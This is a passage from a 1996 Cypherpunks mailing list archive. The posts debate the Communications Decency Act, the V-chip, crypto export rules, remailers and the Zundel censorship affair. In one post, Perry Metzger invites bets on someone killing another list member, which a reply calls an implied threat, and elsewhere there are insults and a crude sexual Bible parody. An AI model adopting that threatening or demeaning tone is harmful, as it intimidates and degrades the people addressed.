accountable.  The rules for the forums are different -- I can't say
anything about Islam in the electrical engineering group.  If I do, I'll
be punished.  But the same content would be perfectly acceptable in
another group that only goes out to the Islamic world.

I don't disagree that eventually such a plan will fail.  But centrally
planned economies competing with market driven ones will eventually fail
as well, and that didn't stop communism from casting a long dark shadow
over the second half of the century.  Is a laissez-faire response based on
an extremely promising but still untested analysis (ie., crypto anarchy)
prudent?

> >We ought to speak out against this Chineese net, and start asking
> >questions about Western companies that are collaborating in its
> >construction.
> 
> The usual suspects: SAIC, Wackenhut, NewsCorp, etc.

What about companies with better images?  Like Sun, RSA, etc?  (I seem to 
remember reading that Sun was selling some hardware -- but my memory 
isn't good, and I could very well be wrong.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 9 Feb 1996 03:09:52 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
In-Reply-To: <m0tkaxx-0008ywC@pacifier.com>
Message-ID: <199602081845.NAA08806@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



jim bell writes:
> >This has gone off into political theory. Could we take it to private
> >mail or some such?
> 
> Apparently, other people are just as unhappy with your attempts to act as 
> "moderator" of this list.  Wake up!  Freedom is on the line.

You are annoying me. How much do people want to bet someone kills 
Jim Bell in the next six months?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Sun, 11 Feb 1996 03:50:57 +0800
To: cypherpunks@toad.com
Subject: Re: CDA; Don't get mad, get even!
In-Reply-To: <199602082043.MAA02979@netcom20.netcom.com>
Message-ID: <m268dhcwu5.fsf@miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "cjs" == cjs  <cjs@netcom.com> writes:

cjs> I think that we should make an example of those responsible for the
cjs> CDA. Ignorance is really not an excuse here, because whoever voted for
cjs> for the bill should have known the CDA was attached to it, and should
cjs> have had some idea of what it did.

Things do work both ways.  Fill the web indexers with information on
yes voters to the CDA.

An Altavista search on ``voting record congress'' yields the URL:
	http://www.vote-smart.org/congress/votes/

Pick either House Votes or Senate Votes as appropriate, look for the
Communications category.

If people opposed to the bill were to attach something to their
.signature referring to their wayward congressman, it would make a
dejanews or altavista news search on that congressman's name most
interesting.  As Tim May has pointed out, this stuff will live forever.

A quick small Web page can be set up merely containing text like:

Andrea Seastrand (CA congressional rep, 22nd district)
Dianne Feinstein (CA Senator)
voted yes on the CDA, reward them appropriately in the next election
(Di-Fei will have to wait until 2002 :-( ).

Barbara Boxer (CA Senator)
voted no on the CDA.

Submit the web page via submit-it to as many indexers as possible.

-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
except you in November.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Fri, 9 Feb 1996 03:41:40 +0800
To: cypherpunks@toad.com
Subject: PRIVACY: Shared Databases
Message-ID: <Pine.BSD.3.91.960208140227.3621A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
  02 08 95 Bloomberg newsstory datelined Chicago, headlined 

          AMERITECH, BELL ATLANTIC AGREE TO SHARE 
                    CALLER ID DATABASES 
 
  reports: 
 
    In December, the Federal Communications Commission mandated 
    that caller ID should be available nationwide and that long- 
    distance companies must carry a caller's name, as well as the 
    number. 
 
 
  But... 
 
    Long-distance companies, which will now be able to compete for 
    customers with the Baby Bells, have dragged their feet, and did- 
    n't carry the names.... 
 
 
  Which means: 
 
    ...it will be up to local phone companies to form alliances.... 
 
 
  The latest example: 
 
    Ameritech Corp. and Bell Atlantic Corp. said they will swap cus- 
    tomer data bases to better carry caller ID calls between their 
    regions. 
 
 
  Back in December Ameritech 
 
    ...signed a similar agreement with U S West.... 
 
 
  And generally, 
 
    ...local phone companies [must] form alliances like the one be- 
    tween Ameritech and Bell Atlantic to offer nationwide caller ID. 
 
 
                              For 
 
                              OUR 
 
                           eyes only! 
 
 
  Cordially, 
 
  Jim 
 
 
 
  NOTE.  The  newsstory's www.nando.net online filename: 
 
                        info12_24399.html 
 
         This critical essay was composed 02 08 96. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Karl A. Siil" <karl@cosmos.att.com>
Date: Fri, 9 Feb 1996 04:05:48 +0800
To: cypherpunks@toad.com
Subject: Re: Report available: "Minimal Key Lengths for Symmetric Ciphers"
Message-ID: <2.2.32.19960208191353.006f1e74@135.20.124.11>
MIME-Version: 1.0
Content-Type: text/plain


At 10:28 AM 2/8/96 -0500, anonymous@freezone.remailer wrote:
>I downloaded this so-called "report". It doesn't even mentions PGP.
>Gotta wonder why the 007 wannabe "experts" and the Big Business (BSA)
>want you to only use 90 bits for your keys and why they've never heard
>of PGP...
>
>Anyone who listens to crypto advice from people who's purpose in life
>is to listen to *YOU* gets what they deserve. I'll stay with PGP which
>has a 2048 bit key.

Ummm, apples and oranges. The report focused on symmetric-key algorithms.
Also, the recommendation was for a *minimum* of 90 bits. I'm sure the
authors would be ecstatic to see *128-bit* (not 2048) IDEA like PGP (or does
PGP encrypt with RSA, too? I thought it only used RSA for signing. I admit
it. I don't know). The purpose of the report was not "90 bits is good." It
was "40 bits is *really* bad."

                                        Karl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 9 Feb 1996 04:14:25 +0800
To: ecarp@netcom.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
In-Reply-To: <199602081913.OAA26739@dal1820.computek.net>
Message-ID: <199602081915.OAA08907@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Ed Carp, KHIJOL SysAdmin" writes:
> Is this an implied threat?  Do you always threaten people who annoy you 
> with death?
> 
> What does this have to do with crypto, anyway?  Take it off-list, Perry...

Ed, Let me make one thing about you perfectly clear.

Plonk.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Fri, 9 Feb 1996 03:57:41 +0800
To: cypherpunks@toad.com
Subject: COPYRIGHT: Skeleton Bill
Message-ID: <Pine.BSD.3.91.960208141726.3621C-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
  02 08 96 Associated Press newsstory datelined Washington, headlined 
 
                 COPYRIGHT VIOLATORS SHOULD FACE 
                       CRIMINAL PENALTIES 
 
  reports: 
 
     The House Judiciary Committee's panel on courts and intellectual 
     property is considering legislation...to clarify copyright law for 
     electronic information. 
 
 
  Panel = subcommittee.  Its chairman is Carlos Moorhead, R-CA.  He says 
   
                the legislation [is] a "skeleton bill" 
 
  which  
 
        "We want to make sure we get...into law this session." 
 
 
  The skeleton of the skeleton law = "recommendations by the Clinton ad- 
  ministration." 
 
  Moorehead also says: 
 
     " We don't want to put so much meat on the skeleton that it dies of 
     obesity." 
 
 
  Testifying before the subcommitte were 
 
     the Motion Picture Association of America's Valenti and 
 
     Broadcast Music Inc's Preston 
 
  who "agreed that the legislation should be passed quickly." 
 
 
  Preston and Valenti  
 
     rejected a proposal by Rep. Rick Boucher, D-Va., to exempt on-line 
     service providers from copyright infringement liability.... 
 
 
  So there goes cheap access to the 'Net. 
 
  That's what 
 
     "We don't want to put so much meat on the skeleton that it dies of 
     obesity" 
 
                                 MEANS! 
 
 
  Cordially, 
 
  Jim 
 
 
 
  NOTE.  The newsstory's www.nando.net online filename is: 
 
                             info7_24355.html 
 
         This critical essay was composed 02 08 96. 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 9 Feb 1996 07:27:51 +0800
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: POTP gets good press
In-Reply-To: <Pine.BSD.3.91.960208155720.6253A-100000@ahcbsd1.ovnet.com>
Message-ID: <Pine.SOL.3.91.960208141829.3442A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 8 Feb 1996, James M. Cobb wrote:
>  
>    The team faced obstacles such as broken steam pipes and a leaky ceiling 
>    in its workroom and scepticism by the engineering and mathematics es- 
>    tablishment. 

Hell, UNC had its entire comms room taken out by a steam pipe breaking 
caused by a water main bursting. Haven't there been any advances in 
technology since the 40s?

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Fri, 9 Feb 1996 04:28:04 +0800
To: cypherpunks@toad.com
Subject: RSA-China Cypto-Porn Distribution ?
Message-ID: <960208142241.2021776b@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain



  > Wall Street Journal, February 8, 1996, p. A10.
  > China, U.S. Firm Challenge U.S. On Encryption-Software Exports
  > By Don Clark


   >RSA Data Security Inc., the dominant supplier of
   >data-privacy software, announced an unusual partnership
   >with the Chinese government that exploits loopholes in U.S.
   >export restrictions on codemaking technology.

And the logical next step would be that the Chinese crypto would be 
adopted by all those wishing to distribute filty, indecent, pornographic
materials depicting the sexual and excretory organs of various mammals
(watch out Shamu - the law said nothing about human organs) to show
a "good faith" effort to protect America's yout.

					Warmly,
						Padgett

	"Life will find a way". Ian - _Jurrasic Park_




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry's Mail Filter" <perry@piermont.com>
Date: Sat, 10 Feb 1996 18:10:03 +0800
To: ecarp@netcom.com
Subject: In Re: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
In-Reply-To: <199602081929.OAA28586@dal1820.computek.net>
Message-ID: <199602081935.OAA08993@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I am sorry, but your message with the Subject:

	Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd) 

was rejected by Perry Metzger's mail filter and will not be read by
him. This is likely because Perry decided to place you on his reject
list. Perry tends to clean out his filter lists every six months, so
you may be able to send him electronic mail again sometime in the
future.

If you absolutely need to contact Perry, please use means other than
electronic mail, or ask a third party to contact him on your behalf.

You will not receive further copies of this notice.

Perry's Mail Filter





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@vishnu.alias.net>
Date: Fri, 9 Feb 1996 06:10:45 +0800
To: Mixmaster Mailing List <cypherpunks@toad.com
Subject: New Type2.list/pubring.mix
Message-ID: <Pine.BSD.3.91.960208150054.7843C-100000@vishnu.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	The new type2.list/pubring.mix combination can be found on 
vishnu.alias.net. Both are available by anonymous FTP and by WWW. Please 
note the new addition, mockingbird.alias.net. Welcome aboard mockingbird!

 John Perry - KG5RG - perry@vishnu.alias.net -  PGP-encrypted e-mail welcome!
 WWW - http://www.alias.net
 PGP 2.62 key for perry@vishnu.alias.net is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp, a Pine/PGP interface.

iQEVAwUBMRplRqghiWHnUu4JAQFtIQf/VaUPHx7bRJP1tdtOQABqy2gYMNIvK8LH
elOX1gmDjvhDBxVMA3iyn7nWpgoP4ty87mDNU4bFRDX8yqz3RjdLFkUvYKZCgWIN
qWMKPRqIDycGELI5Z+tvby7MnxtRgpm9qTB4SR/4RXIkVIJyrZ9BR/3dFSNtKUgr
mfYCPfw2qDd4ZCZXLrQwooNCExp0VA1PP8TuGtTPP/QyDVPOJj5sggQIDTSWd/F7
Rm3h9FmvSTJ7cEaXk0v3OkmwkgzlrS7tJP/XjaX+Vky8yllXh2UuFx4K4s6DhosT
a4MPoQen2Zs6GKn2eOKrJy8h1FZ5e0Hkf1mVYZS/U4+fGl0Rj+Hwkw==
=C4U4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 9 Feb 1996 04:39:57 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
In-Reply-To: <199602081929.OAA28586@dal1820.computek.net>
Message-ID: <199602082007.PAA17280@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> > Ed, Let me make one thing about you perfectly clear.
> > 
> > Plonk.
> 
> "Plonk"?  What does that mean?  Does that mean you're going to hit me 
> with something?  Sounds like another implied threat to me... ;)

"Plonk" is Perry's way of admitting he's really just an alias
for David Sternlight....

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 9 Feb 1996 06:45:16 +0800
To: cypherpunks@toad.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
Message-ID: <v02120d07ad4008682675@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>> Plonk.
>
>"Plonk"?  What does that mean?  Does that mean you're going to hit me
>with something?  Sounds like another implied threat to me... ;)

Funny. That's kind of what Dr. Fred said.

PLONK!

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 9 Feb 1996 05:52:41 +0800
To: cypherpunks@toad.com
Subject: Escrow Key Testimony: Witnesses Wanted
Message-ID: <4l6a7Pi00YUr0fFFEV@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


>From Robert Steele:

        The staff of the Commission on Protecting
 and Reducing Government Secrecy (primary sponsor
 is Senator Moynihan from New York) is looking for
 individuals able to provide authoritative testimony
 for or against the escrow key concept as it applies
 to the effectiveness of law enforcement.

        I suppose this is grand-son of Clipper, but
 it is a serious aspect of their over-all mandate, and
 probably a good idea to help them.

        I recommend direct contact to the deptuy
 staff director, Jacques Rondeau, whose email address
 is <fastermover@ichange.com>.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: random <random@visi.net>
Date: Sun, 11 Feb 1996 08:02:23 +0800
To: cypherpunks@toad.com
Subject: White House Fax #
Message-ID: <199602082050.PAA15427@london.visi.net>
MIME-Version: 1.0
Content-Type: text/plain


if anyone is interested...

>Here's the fax number for the White House...(202) 456-2461. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Fri, 9 Feb 1996 06:05:20 +0800
To: jml216@psu.edu (JOHN MARTIN LEWARS)
Subject: Re: [SILLY] Mailing list
In-Reply-To: <48327.jml216@email.psu.edu>
Message-ID: <199602082053.PAA22765@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


jack writes:
>  Hey hey,
>    Please make me apart of your mailing list.

My my,
To separate yourself from the Cypherpunks mailing list, send 
"unsubscribe cypherpunks" in the body of a message to majordomo@toad.com

Hope this helps!

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Fri, 9 Feb 1996 06:29:39 +0800
To: John Young <jya@pipeline.com>
Subject: Re: POTP gets good press
In-Reply-To: <199602072251.RAA25348@pipe2.nyc.pipeline.com>
Message-ID: <Pine.BSD.3.91.960208155720.6253A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  John, 
 
 
  02 08 96 Reuter Information Service newsstory datelined Philadelphia, 
  headlined 
 
               PIONEER SAYS COMPUTER HAS BEEN NICE, 
                          NOT AWESOME 
 
  reports: 
 
   [Herman] Goldstine was working as an army ballistics researcher when 
   he sold the military on an idea of Penn researchers John Mauchly and 
   J. Prosper Eckert that an electronic computer could vastly hasten the 
   calculation of ballistics tables needed in contemporary warfare. 
 
 
  Fortunately, 
 
   The military backed the idea in June, 1943.... 
 
 
  Unfortunately, 
 
   The team faced obstacles such as broken steam pipes and a leaky ceiling 
   in its workroom and scepticism by the engineering and mathematics es- 
   tablishment. 
 
 
  In particular, 
 
   The National Defence Research Committee, a government agency to evalu- 
   ate new technology, concluded that an electronic computer would be 
   too big and unreliable to be practical. 
 

  How nice that 50 years later, we can gratulate ourselves on 
 
                            Lessons Learned. 
 
 
  Cordially, 
 
  Jim 
 
 
 
  NOTE.  The newsstory's www.nando.net online filename is: 
 
                           info24_16459.html 
 
 
  INCLOSURE: 
 
  Date: Wed, 7 Feb 1996 17:51:22 -0500 
  From: John Young <jya@pipeline.com> 
  To: cypherpunks@toad.com 
  Subject: Re: POTP gets good press 

  Robert "Bob" Harvey once hung out at BBN. Maybe he is the one 
  who seeks slick-kill ripoff with aptly snake-oily-named 
  Internet Security Corp., which may be telephoned at 
  617-863-6400. 
 
 
  POTP was pummeled last fall on c'punks. For the latest 
  lubrications see: 
 
 
       URL: http://www.elementrix.co.il/home.html 
 
 
  Audacious marketing, these NatSec privatizing firms, and the 
  log-rollers for USMA and SAIC, preaching dire threats, 
  promising if-you-knew-what-we-knew security, info-warrioring 
  fundamentalism. 
 
 
 




  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kevin S. Van Horn" <vanhorn@hks.net>
Date: Fri, 9 Feb 1996 06:55:13 +0800
To: cypherpunks@toad.com
Subject: True meaning of CDA
Message-ID: <199602082121.QAA29052@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

cjs@netcom.com (cjs) wrote:
>I think that we should make an example of those responsible for the
>CDA.

And while you're at it, make sure you point out what the acronym CDA
really means:
  Communications Disempowerment Act.

- ------------------------------------------------------------------------------
Kevin S. Van Horn | The really nasty criminals don't break laws --
vanhorn@atext.com | they make them.

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMRppPyoZzwIn1bdtAQHwVQF/d7/FiPBRhSUEpBkreF/dvGGQSGOFAluE
OGSOYtZiAWxLBZBh0pcF3O54lgjaGq9w
=Sj4I
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Charles Graves <llurch@networking.stanford.edu>
Date: Fri, 9 Feb 1996 09:16:22 +0800
To: cypherpunks@toad.com
Subject: [Speaking of mail headers] the Zundel 'Censorship' fraud
Message-ID: <199602090037.QAA09266@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


As recently posted by my close friend rich@c2.org.

Ingrid could have fired up a mirror site at cts.com any time she pleased.

-----BEGIN PGP SIGNED MESSAGE-----

wrightd@merlin.magic.mb.ca writes:
>In group can.politics, article <31152afc.732040@news.snafu.de>,
>tilman@berlin.snafu.de (Tilman Hausherr) wrote:
>
>...
>
>>This info as a reponse to the guy who said that Zündel hasn't access to
>>the net himself.
>
>Tilman, if Zundel has his own web server, he doesn't *need* access to the
>internet to get his own web page.  He just has to be on a LAN (local area
>network).  He can fake any part of the internet by having his own server on
>his own network, but that doesn't *prove* that he has access to anything -
>it just shows that he has a good computer system.

N:~> host ezundel.cts.com
ezundel.cts.com has address 204.212.157.52

This is not a troll or a masquerade. You will see that genuine
authenticated email messages and posts from Zundel's official spokesperson
"Ingrid" come from this IP address. 

The contents of this message were lies too, but hey, I'm not into posting
private email. 

Received: from mailhub.cts.com (mailhub.cts.com [192.188.72.25]) by 
Networking.Stanford.EDU (8.6.11/8.6.6) with SMTP id EAA29094 for 
<llurch@networking.stanford.edu>; Wed, 31 Jan 1996 04:15:15 -0800
Received: from [204.212.157.52] by mailhub.cts.com with smtp
        (Smail3.1.29.1 #20) id m0thbRP-000V34C; Wed, 31 Jan 96 04:15 PST
Date: Wed, 31 Jan 96 04:15 PST
X-Sender: ezundel@mail.cts.com
Message-Id: <v01530504ad34a8781ca2@[204.212.157.52]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: Rich Graves <llurch@networking.stanford.edu>
From: ezundel@cts.com (E. Zundel)
Subject: Re: I believe we've been conned.
Cc: declan+@CMU.EDU

- -rich
 Institute for Ernst Zundel Revisionism
 http://36.190.0.210/~llurch/Not_By_Me_Not_My_Views/
 "First, bring down Zundel's suffering in terms of numbers and
 events, both real and imagined, to what it really was, not what
 they say it was, what they exploit for their own political,
 financial, and geopolitical purposes."

AltaVista/DejaNews fodder:

Zundel Zundel Zundel Zundel Zundel Zundel Zundel Zundel Zundel Zundel Zundel
Deutsche Telekom Deutsche Telekom Deutsche Telekom Deutsche Telekom Deutsche
Nazi Propaganda Nazi Propaganda Nazi Propaganda Nazi Propaganda Nazi Propaganda 
Censorship Censorship Censorship Censorship Censorship Censorship Censorship
Simon Wiesenthal Center Simon Wiesenthal Center Simon Wiesenthal Center 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRqUJo3DXUbM57SdAQEJ2wP6AvMiAveRWoWJFqcvTO4Q3qFUY1a9iVKN
Aw7NkoJJiH21WmRuATODxi9OtQQ9okVrNxJMMIaXPaF5SAm5Lk4Of+1IG1ULhKcx
QamSe/NN9z4vZLyaM4j1UVJ09On/0TdyzMdRx6S5yDgpCqzLc+2coDcoINtxCRsr
pqmBcsDtAMM=
=qUEe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 9 Feb 1996 07:46:30 +0800
To: cypherpunks@toad.com
Subject: Re: Tell me whats wrong with this
Message-ID: <ad3fbfd51f021004ca84@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:06 PM 2/8/96, avatar@mindspring.com wrote:
>Tell me whats wrong with this section of the telecom bill.  I have a six
>year old boy I am trying to raise
>and it is hard enough to teach him respect and values without explaining why
>Ned Beatty is being
>bungholed in the woods by Billy Bob or why the Terminator splattered this
>guys brains all over the
>wall.
>        Tell me why parents should not be able to censor their OWN
>television so that they may raise their children the way THEY see
>fit...................Did your dad give you his old
>playboys?.........NOOOOO............
>Did he take you down to your grandmothers autopsy before her
>funeral?...................I Don't Think So.....
>        Honestly, don't you believe that what a child is exposed to effects
>his judgement, perception,
> attitude,and character??

I think Avatar is having some kind of fit here, but I will attempt to
answer his questions.

First, most televisions and VCRs are currently equipped with the
"O-Switch," which parents have long been using to turn content on and off.

Second, assuming you have televisions and VCRs at this time, you surely
must realize that these will not be affected by the V-Chip? There is no
retrofit plan (thankfully) and so it will take well over a decade at
current replacement rates for most households to have only V-chipped sets.
(Perhaps Avatar is different from most of us, and plans to dump his
existing televisions and VCRs and replace them with V-Chipped machines.)

Third, the main objection most of us have is to the _coercive_ aspect. I
have no objection to you and your 6-year-old son buying a V-chip type of
gadget, but I don't want to be told in a free society that this is the only
choice *I* will have. (Amongst other things, I don't believe the $2 per
machine estimate, and neither do the set makers.)

Fourth, there are major ambiguities in ratings. Will "Schindler's List" be
rated as more violent and sexually explicit than "The Terminator"?
Probably, by objective standards (my objective standards, that is). Imagine
the uproar.

Fifth, there is the general notion that government must screen material
and/or act as babysitter. This leads to all sorts of problems.

>All I'm saying is it's tough to raise a child these days without the added
>distortion of modern
>programing and parents need not be denied any tool that can help them
>achieve success.

"Need not be denied" = "Put this chip in your machines and adopt a ratings
service or we will shut your factory down and close your network."

Some opinion for a Cypherpunk to have. And quite a contrast with your own sig.

In any case, your 6-year-old son will be 8 before the first V-Chip-equipped
sets appear on the market, at the earliest (no technical standards have
even been proposed, no ratings services proposed, etc., so I doubt V-chips
will appear before 1999). However, unless you dump all your existing sets
and VCRs (remember that all VCRs act as tuners...that's how I watch t.v.,
through my VCR tuner), little Johnny will still be able to tune in to Bad
Thoughts.

And even if you get all V-chipped equipment, by, say, 2002, when Johnny is
12, he'll undoubtedly be able to find some of his buddies who have their
own VCRs, DirectTV dishes, etc. They'll have a blast watching "Debbie Does
Fort Meade."


>
>||The government  is my shepherd I need not work. It alloweth me to lie
> down on a good job. It leadeth me beside stilled factories. It destroyeth
> my initiative. It leadeth me in the path of a parasite for politics sake. YEA,
> though I walk through the valley of laziness and deficet spending I shall
> fear no evil, for the government is with me. It prepareth an economic utopia
> for me by appropriating the earnings of my grandchildren. It filleth my head
> with false security. My inefficiency runeth over. Surely, the government
>should care for me all the days of my life, and I will dwell in a fools
>paradise
>forever.................AMEN!   || nuke'm if ya got'em||

You believe this about the government, and yet you want the government to
mandate a chip in receivers to stop Bad Thoughts?

Jeesh.

--Tim May

[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and do em right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should do him." So the two daughters got him drunk and
did him all that night. Sure enough, Dad got em pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he whacked off first....Remember, it's
not a good idea to have sex with your sister, your brother, your parents,
your pet dog, or the farm animals. [excerpts from the Old Testament, Modern
Vernacular Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <treehole@mockingbird.alias.net>
Date: Fri, 9 Feb 1996 10:17:29 +0800
To: cypherpunks@toad.com
Subject: cypher-list for telcom legislation
Message-ID: <199602090045.QAA05892@myriad>
MIME-Version: 1.0
Content-Type: text/plain


	Since the telcom legislation has been passed, I thought it might
be prudent to remind everyone that there is a PGP encrypted mailing list
called cypher-list. It can be subscribed to by sending email to
cypher-list-request@vishnu.alias.net. All messages and transactions are
encrypted. The code is a little buggy but it works for the most part. It
seems that cypher-list would make an excellent platform for discussion on
the telcom legislation and maybe even ways to thwart it. If you have
trouble subscribing, perry@vishnu.alias.net has been very helpful. (he got
me on!)

Lazarus





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Fri, 9 Feb 1996 07:14:13 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Free Speech Mirrors hit Toronto Star
In-Reply-To: <Pine.OSF.3.91.960208130311.23188D-100000@nic.wat.hookup.net>
Message-ID: <199602082158.QAA22922@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim Philp writes:
> 	Canada's largest newspaper, The Toronto Star today published an
> account of the Ernst Zundel affair in the Fast Forward Section of the
> paper. Net columnist K. K. Campbell, in what looks like a 1500 word
> article, (I didn't count them) gives a good account of the German attempt
> to censor the Internet. He even mentions the fact that the MIT mirror was
							 ~~~~~~~~~~~~~~~~~~
> ordered removed, but gives no details.
  ~~~~~~~~~~~~~~~

Is this a reporting error, or did I miss something ?

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: avatar@mindspring.com
Date: Fri, 9 Feb 1996 07:14:28 +0800
To: tcmay@mail.got.net
Subject: Tell me whats wrong with this
Message-ID: <199602082209.RAA17085@borg.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Tell me whats wrong with this section of the telecom bill.  I have a six
year old boy I am trying to raise
and it is hard enough to teach him respect and values without explaining why
Ned Beatty is being
bungholed in the woods by Billy Bob or why the Terminator splattered this
guys brains all over the
wall.  
        Tell me why parents should not be able to censor their OWN
television so that they may raise their children the way THEY see
fit...................Did your dad give you his old
playboys?.........NOOOOO............
Did he take you down to your grandmothers autopsy before her
funeral?...................I Don't Think So.....
        Honestly, don't you believe that what a child is exposed to effects
his judgement, perception,
 attitude,and character??

All I'm saying is it's tough to raise a child these days without the added
distortion of modern 
programing and parents need not be denied any tool that can help them
achieve success.
         
 SEC. 551. PARENTAL CHOICE IN TELEVISION PROGRAMMING.
            (a) FINDINGS- The Congress makes the following findings:
                (1) Television influences children's perception of the values
              and behavior that are common and acceptable in society.
                (2) Television station operators, cable television system
              operators, and video programmers should follow practices in
              connection with video programming that take into consideration
              that television broadcast and cable programming has established
              a uniquely pervasive presence in the lives of American children.
                (3) The average American child is exposed to 25 hours of
              television each week and some children are exposed to as much 
              as 11 hours of television a day.
                (4) Studies have shown that children exposed to violent video
              programming at a young age have a higher tendency for violent
              and aggressive behavior later in life than children not so
              exposed, and that children exposed to violent video programming
              are prone to assume that acts of violence are acceptable
              behavior.
                (5) Children in the United States are, on average, exposed to
              an estimated 8,000 murders and 100,000 acts of violence on
              television by the time the child completes elementary school.
                (6) Studies indicate that children are affected by the
              pervasiveness and casual treatment of sexual material on
              television, eroding the ability of parents to develop
              responsible attitudes and behavior in their children.
                (7) Parents express grave concern over violent and sexual
              video programming and strongly support technology that would
              give them greater control to block video programming in the 
              home that they consider harmful to their children.
                (8) There is a compelling governmental interest in empowering
              parents to limit the negative influences of video programming
              that is harmful to children.
                (9) Providing parents with timely information about the 
